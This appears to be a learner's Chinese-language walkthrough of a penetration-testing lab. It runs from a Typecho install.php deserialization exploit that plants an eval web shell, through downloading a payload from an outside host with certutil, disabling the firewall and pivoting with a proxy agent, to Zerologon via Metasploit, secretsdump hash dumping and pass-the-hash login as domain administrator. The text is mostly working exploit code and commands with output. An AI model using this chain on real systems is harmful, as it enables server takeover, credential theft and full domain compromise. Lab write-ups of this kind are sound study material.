因为配置网络太麻烦了,我直接让ai帮我配置好。但是还得再web服务器里重新安装typecho并配置数据库和php版本,这一部分没记录,直接开始渗透吧
发现有install.php(不是我故意没删,是环境中本来就有的)

typecho关于install.php有两个漏洞,一个任意执行和一个反序列化
<?php
class Typecho_Request
{
private $_filter = array();
private $_params = array();
public function __construct(){
$this->_filter[0] = 'assert';
$this->_params['screenName'] = 'file_put_contents("shell.php", "<?php @eval(\$_POST[cmd]); ?>")';
}
}
class Typecho_Feed
{
const RSS2 = 'RSS 2.0';
private $_type;
private $_items = array();
public function __construct(){
$this->_type = self::RSS2;
$this->_items[0] = array(
'author' => new Typecho_Request(),
);
}
}
$final = new Typecho_Feed();
$poc = array(
'adapter' => $final,
'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($poc)));
?>






certutil -urlcache -split -f http://192.168.111.129:7777/abc.exe file.exe


netsh advfirewall set allprofiles state off
Beacon中upload C:\Users\Kane\Desktop\可汗大点兵\Stowaway代理工具\windows_x64_agent.exe
kali中./linux_x64_admin -l 9090
跳板机Windows中 windows_x64_agent.exe -c 192.168.111.129:9090
在kali上开启sock5代理




这里可以看见开放了 88 端口 (Kerberos) 且系统为 windows server 2012 R2 可以使用CVE-2020-1472。
Zerologon(CVE-2020-1472)的惊人危害根植于Netlogon协议一个致命的密码学实现缺陷。该协议在认证过程中使用AES-CFB8模式时,错误地允许客户端使用全零的初始化向量(IV)。这一设计使得攻击者能够伪造一个同样全零的客户端凭证,并由于加密链的反馈特性,导致校验值在特定情况下(概率高达1/256)与服务器预期匹配,从而无需任何真实凭证即可通过认证。攻击者通过数次至数百次连接尝试,便能在几分钟内成功将自己验证为域控制器本身,进而执行重置域控机器账户密码等高危操作,最终完全接管整个Active Directory域,其利用之简单与后果之严重使其成为史上最危险的Windows漏洞之一。
searchCVE-2020-1472
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
set RHOSTS 10.10.10.10
set NBNAME DC
set Proxies socks5:127.0.0.1:1080
run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:49155 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:127.0.0.1[49155] ...
[*] 127.0.0.1:49155 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:127.0.0.1[49155] ...
[+] 127.0.0.1:49155 - Successfully authenticated
[+] 127.0.0.1:49155 - Successfully set the machine account (DC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed

proxychains4 impacket-secretsdump -no-pass DC\$@10.10.10.10

用Impacket 工具 secretsdump.py 导出 Windows 系统中的密码哈希,空密码登录
proxychains4 impacket-wmiexec -hashes :dc044e0908498f7c475ae50bd70da92c administrator@10.10.10.10
使用 NTLM 哈希进行 Pass-The-Hash 登录,然后通过 WMI 执行命令。

whoami一下是管理员,拿下域控,写黄金凭证先不做了,这套题花的时间太长了









